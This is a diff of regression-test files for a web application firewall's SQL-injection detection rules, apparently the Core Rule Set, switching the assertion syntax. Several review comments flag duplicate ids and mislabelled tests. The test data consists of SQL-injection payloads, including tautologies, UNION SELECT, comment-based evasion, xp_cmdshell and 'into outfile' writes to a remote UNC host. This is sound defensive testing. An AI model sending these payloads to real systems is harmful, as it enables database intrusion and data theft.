expect_ids: [942440] - test_id: 7 desc: "SQL Comment Sequence" stages: 
@@ -113,7 +119,8 @@ tests: uri: "/post" data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 8 desc: "SQL Comment Sequence" stages: @@ -129,7 +136,8 @@ tests: uri: "/post" data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 9 desc: "SQL Comment Sequence" stages: @@ -145,7 +153,8 @@ tests: uri: "/post" data: "test=' or 1=1# " output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 10 desc: "SQL Comment Sequence" stages: @@ -161,7 +170,8 @@ tests: uri: "/post" data: "test=‘ or 1=1-- -" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 11 desc: "SQL Comment Sequence" stages: @@ -177,7 +187,8 @@ tests: uri: "/post" data: "test=‘ or 1=1/*" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 12 desc: "SQL Comment Sequence" stages: @@ -193,7 +204,8 @@ tests: uri: "/post" data: "test=1='1' or-- -" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 13 desc: "SQL Comment Sequence" stages: @@ -209,7 +221,8 @@ tests: uri: "/post" data: "test=' /*!50000or*/1='1" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 14 desc: "SQL Comment Sequence" stages: @@ -225,7 +238,8 @@ tests: uri: "/post" data: "test=' /*!or*/1='1" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 15 desc: "SQL Comment Sequence" stages: @@ -241,7 +255,8 @@ tests: uri: "/post" data: "test=0/**/union/*!50000select*/table_name`foo`/**/" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 16 desc: "Avoid False Positive on JWT (body)" stages: 
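Review bot: The payloads of tests 10 and 11 (`data: "test=‘ or 1=1-- -"` and `data: "test=‘ or 1=1/*"` in the hunks at -161 and -177) use U+2018 LEFT SINGLE QUOTATION MARK rather than the ASCII apostrophe used by every other case in this file, and nothing in their desc says this is intentional. If the curly quote is meant to exercise a Unicode-quote variant, the desc should state it, e.g. `desc: "SQL Comment Sequence (Unicode left quote)"`; if it is a copy-paste artifact, the data should be `test=' or 1=1-- -`. Since 942440 appears to match on the comment sequence rather than the quote, the test presumably passes either way, which is exactly why the intent needs to be written down.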
@@ -256,7 +271,8 @@ tests: uri: "/post" data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" output: - no_log_contains: id "942440" + log: + no_expect_ids: [942440] - test_id: 17 desc: "Avoid False Positive on JWT (cookie)" stages: @@ -272,7 +288,8 @@ tests: uri: "/post" data: "foo=bar" output: - no_log_contains: id "942440" + log: + no_expect_ids: [942440] - test_id: 18 desc: "Avoid False Positive on JWT (querystring)" stages: @@ -286,7 +303,8 @@ tests: version: "HTTP/1.1" uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" output: - no_log_contains: id "942440" + log: + no_expect_ids: [942440] - test_id: 19 desc: "False positive against Facebook click identifier" stages: @@ -300,7 +318,8 @@ tests: version: "HTTP/1.1" uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" output: - no_log_contains: id "942440" + log: + no_expect_ids: [942440] - test_id: 20 desc: "False positive against Google click identifier" stages: @@ -314,4 +333,5 @@ tests: version: "HTTP/1.1" uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" output: - no_log_contains: id "942440" + log: + no_expect_ids: [942440] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml index 7d86d5a89..6254021d0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml @@ -18,7 +18,8 @@ tests: data: "var=%5c0xf00dsdfdsa" version: HTTP/1.0 output: - log_contains: id "942450" + log: + expect_ids: [942450] - test_id: 2 desc: "SQL Hex Encoding" stages: 
@@ -34,7 +35,8 @@ tests: data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" version: HTTP/1.0 output: - log_contains: id "942450" + log: + expect_ids: [942450] - test_id: 3 desc: "SQL Hex Encoding" stages: @@ -50,7 +52,8 @@ tests: data: "var=select%200x616263" version: HTTP/1.0 output: - log_contains: id "942450" + log: + expect_ids: [942450] - test_id: 4 desc: "SQL Hex Encoding - negative" stages: @@ -66,7 +69,8 @@ tests: data: "var=IHRlc3Q0xAcF" version: HTTP/1.0 output: - no_log_contains: id "942450" + log: + no_expect_ids: [942450] - test_id: 5 desc: "SQL Hex Encoding - negative" stages: @@ -82,4 +86,5 @@ tests: data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" version: HTTP/1.0 output: - no_log_contains: id "942450" + log: + no_expect_ids: [942450] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml index 7ce8f78c5..49e020b98 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml @@ -18,7 +18,8 @@ tests: data: "var=foo...." version: HTTP/1.1 output: - log_contains: id "942460" + log: + expect_ids: [942460] - test_id: 2 desc: "Repetitive Non-Word Characters negative test only 3 characters" stages: @@ -34,4 +35,5 @@ tests: data: "var=foo..." version: HTTP/1.1 output: - no_log_contains: id "942460" + log: + no_expect_ids: [942460] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index 894edcb3e..72caff6e7 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml 
@@ -18,7 +18,8 @@ tests: data: "pay=nvarchar" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 2 desc: "SQL Injection Attack" stages: @@ -34,7 +35,8 @@ tests: data: "pay=xp_cmdshell" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 3 desc: "SQL Injection Attack" stages: @@ -50,7 +52,8 @@ tests: data: "pay=varchar" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 4 desc: "SQL Injection Attack" stages: @@ -66,7 +69,8 @@ tests: data: "pay=xp_dirtree" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 5 desc: "SQL Injection Attack" stages: @@ -82,7 +86,8 @@ tests: data: "pay=xp_regread" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 6 desc: "SQL Injection Attack" stages: @@ -98,7 +103,8 @@ tests: data: "pay=sp_password" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 7 desc: "SQL Injection Attack" stages: @@ -114,7 +120,8 @@ tests: data: "pay=UTL_HTTP" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 8 desc: "SQL Injection Attack" stages: @@ -130,7 +137,8 @@ tests: data: "pay=OPENROWSET" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 9 desc: "SQL Injection Attack" stages: @@ -146,7 +154,8 @@ tests: data: "pay=sp_executesql" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 10 desc: "SQL Injection Attack" stages: @@ -162,7 +171,8 @@ tests: data: "sp_executesql" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 11 desc: "SQL Injection Attack: current_user" stages: @@ -177,4 +187,5 @@ tests: uri: "/get/index.php?id=1%2bcurrent_user::int" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] 
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index e0b642eec..e12ca7023 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -19,7 +19,8 @@ tests: uri: "/?'msdasql'" version: HTTP/1.0 output: - log_contains: "id \"942480" + log: + expect_ids: [942480] - test_id: 2 desc: "SQL Injection Attack" stages: @@ -32,7 +33,8 @@ tests: uri: "/get?'msdasql'" version: HTTP/1.0 output: - log_contains: "id \"942480" + log: + expect_ids: [942480] - test_id: 2 desc: "SQL Injection Attack" stages: @@ -50,7 +52,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: "id \"942480" + log: + expect_ids: [942480] - test_id: 3 desc: "Data dump using 'into outfile'" stages: @@ -66,7 +69,8 @@ tests: data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 4 desc: "Data dump using 'into outfile'" stages: @@ -82,7 +86,8 @@ tests: data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 5 desc: "SQL injection using 'UNION ALL" stages: @@ -98,7 +103,8 @@ tests: data: "var=0.3480567293179807' UNION ALL select NULL --" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 6 desc: "SQL injection using 'UNION ALL" stages: @@ -114,7 +120,8 @@ tests: data: "var=config.ini\") UNION ALL select NULL --" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 7 desc: "SQL injection using 'UNION ALL" stages: 
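Review bot: 942480.yaml carries `test_id: 2` twice — once for the `/get?'msdasql'` case in the hunk at -32 and again for the `/post` case in the hunk at -50 — while this series keys platform overrides by `RULEID-TESTID` names (e.g. `942480-2`), so an override or a per-id selection for this file would be ambiguous. Renumber the second occurrence to `test_id: 3` and shift the following cases (currently 3–12) up by one so every id in the file is unique. I cannot tell from the diff whether the runner rejects or silently merges duplicate ids, so this is worth checking against the go-ftw validation as well.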
@@ -130,7 +137,8 @@ tests: data: "var=CRS) UNION ALL select NULL --" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 8 desc: "SQL injection using 'UNION ALL" stages: @@ -146,7 +154,8 @@ tests: data: "var=CRS3\") UNION ALL select NULL --" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 9 desc: "SQL injection using 'overlay(...placing..)" stages: @@ -161,7 +170,8 @@ tests: uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 10 desc: "SQL injection in User-Agent" stages: @@ -176,7 +186,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 11 desc: "SQL injection in arbitrary header" stages: @@ -192,7 +203,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 12 desc: "SQL injection using 'overlay(...placing..) with newlines" stages: @@ -207,4 +219,5 @@ tests: uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml index 1f4a15f8c..d91924c63 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml @@ -18,7 +18,8 @@ tests: data: "var=%22%60%20%2A%20123" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 2 desc: "classic SQL injection probings 3/3" stages: 
@@ -34,7 +35,8 @@ tests: data: "' ', 10" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 3 desc: "classic SQL injection probings 3/3" stages: @@ -50,7 +52,8 @@ tests: data: "'', '', '', '', '', '', '', '', 13" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 4 desc: "classic SQL injection probings 3/3" stages: @@ -66,7 +69,8 @@ tests: data: "`>65" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 5 desc: "classic SQL injection probings 3/3" stages: @@ -82,7 +86,8 @@ tests: data: "pay='1001'='10" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 6 desc: "classic SQL injection probings 3/3" stages: @@ -98,7 +103,8 @@ tests: data: "\"2562*23" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 7 desc: "classic SQL injection probings 3/3" stages: @@ -114,7 +120,8 @@ tests: data: "pay=\":[\"00" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 8 desc: "classic SQL injection probings 3/3" stages: @@ -130,7 +137,8 @@ tests: data: "pay=`>6fbdec2" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 9 desc: "classic SQL injection probings 3/3" stages: @@ -146,7 +154,8 @@ tests: data: "pay='][0]]), strtolower($b[$GLOBALS['" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 10 desc: "classic SQL injection probings 3/3" stages: @@ -162,7 +171,8 @@ tests: data: "pay=', 2, 1" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 11 desc: "classic SQL injection probings 3/3" stages: @@ -178,7 +188,8 @@ tests: data: "`>9e7" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 12 desc: "classic SQL injection probings 3/3" stages: 
@@ -194,7 +205,8 @@ tests: data: "pay=\":\"65" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 13 desc: "classic SQL injection probings 3/3" stages: @@ -210,7 +222,8 @@ tests: data: "pay='\\2nq5" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 14 desc: "classic SQL injection probings 3/3" stages: @@ -226,7 +239,8 @@ tests: data: "pay=` < 0) AND `" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 15 desc: "classic SQL injection probings 3/3" stages: @@ -242,7 +256,8 @@ tests: data: "pay='0:0:6" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 16 desc: "classic SQL injection probings 3/3" stages: @@ -258,7 +273,8 @@ tests: data: "\":60" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 17 desc: "classic SQL injection probings 3/3" stages: @@ -274,7 +290,8 @@ tests: data: "pay=\">%5 - type_submit_reset_5" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 18 desc: "classic SQL injection probings 3/3" stages: @@ -290,7 +307,8 @@ tests: data: "\":35" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 19 desc: "classic SQL injection probings 3/3" stages: @@ -306,7 +324,8 @@ tests: data: "pay='3085'='30" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 20 desc: "classic SQL injection probings 3/3" stages: @@ -322,7 +341,8 @@ tests: data: "\":\"[0,\\x22" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 21 desc: "classic SQL injection probings 3/3" stages: @@ -338,7 +358,8 @@ tests: data: "pay='16/17" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 22 desc: "classic SQL injection probings 3/3" stages: 
@@ -354,4 +375,5 @@ tests: data: "\";}7b6" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml index 2e5c69a02..54e148077 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" version: HTTP/1.0 output: - log_contains: id "942500" + log: + expect_ids: [942500] - test_id: 2 desc: "Use of portability comment (/*!...*/) as evasion technique, with space before !" stages: @@ -33,7 +34,8 @@ tests: uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" version: HTTP/1.0 output: - log_contains: id "942500" + log: + expect_ids: [942500] - test_id: 3 desc: "Use of optimizer hints (/*+...*/) as evasion technique" stages: @@ -48,7 +50,8 @@ tests: uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" version: "HTTP/1.1" output: - log_contains: id "942500" + log: + expect_ids: [942500] - test_id: 4 desc: "Use of optimizer hints (/*+...*/) as evasion technique with space before +" stages: @@ -63,7 +66,8 @@ tests: uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" version: "HTTP/1.1" output: - log_contains: id "942500" + log: + expect_ids: [942500] - test_id: 5 desc: "Status Page Test - MySQL inline comment detected" stages: @@ -78,4 +82,5 @@ tests: uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" version: HTTP/1.0 output: - log_contains: id "942500" + log: + expect_ids: [942500] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml index 1b91b767f..f350dee55 100644 
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?`bla`" version: HTTP/1.0 output: - log_contains: id "942510" + log: + expect_ids: [942510] - test_id: 2 desc: "SQLi bypass detected: backticks" stages: @@ -32,4 +33,5 @@ tests: uri: "/get?'bla'" version: HTTP/1.0 output: - no_log_contains: id "942510" + log: + no_expect_ids: [942510] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml index f2c76b472..7dd1d827b 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?`bla`" version: HTTP/1.0 output: - no_log_contains: id "942511" + log: + no_expect_ids: [942511] - test_id: 2 desc: "SQLi bypass detected: quotes" stages: @@ -32,4 +33,5 @@ tests: uri: "/get?'bla'" version: HTTP/1.0 output: - log_contains: id "942511" + log: + expect_ids: [942511] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml index 7bd43221f..be7dd030a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml @@ -19,7 +19,8 @@ tests: data: "var=id'is%20not-id--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 2 desc: "Negative test: 'is notes" stages: @@ -35,7 +36,8 @@ tests: data: "var=id'is%20notes" version: HTTP/1.0 output: - no_log_contains: id "942520" + log: + no_expect_ids: [942520] - test_id: 3 desc: "Detects basic SQL auth bypass with 'not like something'" stages: 
@@ -51,7 +53,8 @@ tests: data: "var=id'not%20like%20id--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 4 desc: "Detects basic SQL auth bypass with 'not glob'" stages: @@ -67,7 +70,8 @@ tests: data: "var=id'not%20glob-id--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 5 desc: "Detects basic SQL auth bypass with 'not like glob'" stages: @@ -83,7 +87,8 @@ tests: data: "var=id'not%20glob-id--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 6 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -100,7 +105,8 @@ tests: data: "var=x'%7Cemail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 7 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -117,7 +123,8 @@ tests: data: "var=x'-email--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 8 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -134,7 +141,8 @@ tests: data: "var=x'%252Bemail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 9 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -151,7 +159,8 @@ tests: data: "var=x'%5Eemail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 10 desc: "Nagive test: Detects basic SQL auth bypass with binary operators" stages: @@ -168,7 +177,8 @@ tests: data: "var=x'%40email--" version: HTTP/1.0 output: - no_log_contains: id "942520" + log: + no_expect_ids: [942520] - test_id: 11 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -185,7 +195,8 @@ tests: data: "var=x'%26email--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 12 desc: "Detects basic SQL auth bypass with binary operators" stages: 
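Review bot: Test 5 in 942520.yaml is described as "Detects basic SQL auth bypass with 'not like glob'" but its payload in the hunk at -83 is `var=id'not%20glob-id--`, byte-identical to test 4's 'not glob' case, so the `not like glob` form the desc claims to cover is never sent. If the intent is what the desc says, the data should presumably be `data: "var=id'not%20like%20glob-id--"`; if the rule is not expected to handle that form, the desc should be corrected instead of silently duplicating test 4.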
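Review bot: The desc of test 10 in the context of the hunk at -151 reads "Nagive test: Detects basic SQL auth bypass with binary operators"; since this is a `no_expect_ids` case it should be `desc: "Negative test: Detects basic SQL auth bypass with binary operators"` so it is findable alongside the other negative cases in the file.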
@@ -202,7 +213,8 @@ tests: data: "var=x'%3Cemail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 13 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -219,7 +231,8 @@ tests: data: "var=x'%3Eemail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 14 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -236,7 +249,8 @@ tests: data: "var=x'%3Demail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 15 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -253,7 +267,8 @@ tests: data: "var=x'%2Femail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 16 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -270,7 +285,8 @@ tests: data: "var=x'%25email--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 17 desc: "Negative test: Detects basic SQL auth bypass with binary operators" stages: @@ -287,7 +303,8 @@ tests: data: "var=x'~email--" version: HTTP/1.0 output: - no_log_contains: id "942520" + log: + no_expect_ids: [942520] - test_id: 18 desc: "Detects basic SQL auth bypass with mod" stages: @@ -303,7 +320,8 @@ tests: data: "var=x'%20mod%20id--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 19 desc: "Detects basic SQL auth bypass with: sounds like" stages: @@ -319,7 +337,8 @@ tests: data: "var='sounds%20like%20rowid--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 20 desc: "Bypass with a comment" stages: @@ -335,7 +354,8 @@ tests: data: "var='%2F**%2F*2--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 21 desc: "Integration test: 942521 blocks foo'or'oof" stages: 
@@ -351,7 +371,8 @@ tests: data: "var=foo'or'oof" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 22 desc: "Integration test: 942522 blocks foo\\''or'oof" stages: @@ -367,7 +388,8 @@ tests: data: "var=foo%5c''or'oof" version: HTTP/1.0 output: - log_contains: id "942522" + log: + expect_ids: [942522] - test_id: 23 desc: "Detect auth bypass email=' is not?--" stages: @@ -383,4 +405,5 @@ tests: data: "email=%27%20is%20not%3F--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml index e01b0059b..29eec3976 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml @@ -19,7 +19,8 @@ tests: data: "var=a'or'a" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 2 desc: "Detects basic SQLite authentication bypass with 'or?'" stages: @@ -35,7 +36,8 @@ tests: data: "var=a'or?--" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 3 desc: "False-positive: Detects or-based authentication bypass" stages: @@ -51,7 +53,8 @@ tests: data: "var=is%20this%20your%20parents'%20or%20yours?" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 4 desc: "Detects basic SQL auth bypass and-based" stages: @@ -67,7 +70,8 @@ tests: data: "var=user'and%20id%20is%20not?--" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 5 desc: "False-positve: is it your parents' or yours" stages: 
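Review bot: Test 3 of 942521.yaml (hunk at -51) sends the benign sentence `is this your parents' or yours?` and asserts `expect_ids: [942521]` while its desc calls it a "False-positive"; the same pattern appears in test 5 on the next hunk line. Pinning a known false positive as the expected outcome means a later improvement that stops the rule from firing on this text will fail the regression suite, with nothing in the test explaining that the failure is actually good news. If the false positive is accepted, say so explicitly, e.g. `desc: "Known false positive (accepted): or-based bypass pattern matches possessive 'parents' or'"`; if the rule is supposed to let this text through, the assertion should be `no_expect_ids: [942521]` instead.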
@@ -83,7 +87,8 @@ tests:
 data: "var=it%20is%20your%20parents'%20and%20yours"
 version: HTTP/1.0
 output:
- log_contains: id "942521"
+ log:
+ expect_ids: [942521]
 - test_id: 6
 desc: "Negative test: bob's or alice's"
 stages:
@@ -99,7 +104,8 @@ tests:
 data: "var=bob's%20or%20alice's"
 version: HTTP/1.0
 output:
- no_log_contains: id "942521"
+ log:
+ no_expect_ids: [942521]
 - test_id: 7
 desc: "Negative test: mother or daugher"
 stages:
@@ -115,7 +121,8 @@ tests:
 data: "var=mother%20or%20daughter"
 version: HTTP/1.0
 output:
- no_log_contains: id "942521"
+ log:
+ no_expect_ids: [942521]
 - test_id: 8
 desc: "Negative test: 'oreo"
 stages:
@@ -131,7 +138,8 @@ tests:
 data: "var='oreo"
 version: HTTP/1.0
 output:
- no_log_contains: id "942521"
+ log:
+ no_expect_ids: [942521]
 - test_id: 9
 desc: "Negative test: 'fork"
 stages:
@@ -147,7 +155,8 @@ tests:
 data: "var='fork"
 version: HTTP/1.0
 output:
- no_log_contains: id "942521"
+ log:
+ no_expect_ids: [942521]
 - test_id: 10
 desc: "Negative test: 'for"
 stages:
@@ -163,7 +172,8 @@ tests:
 data: "var='%20for"
 version: HTTP/1.0
 output:
- no_log_contains: id "942521"
+ log:
+ no_expect_ids: [942521]
 - test_id: 11
 desc: "Negative test: ''or"
 stages:
@@ -179,7 +189,8 @@ tests:
 data: "var=''or"
 version: HTTP/1.0
 output:
- no_log_contains: id "942521"
+ log:
+ no_expect_ids: [942521]
 - test_id: 12
 desc: "Negative test: 'books' or 'applles'"
 stages:
@@ -195,7 +206,8 @@ tests:
 data: "var=''or"
